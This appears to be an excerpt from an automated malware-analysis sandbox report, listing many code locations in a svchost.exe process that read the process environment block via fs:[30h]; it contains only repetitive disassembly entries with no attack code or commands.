Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
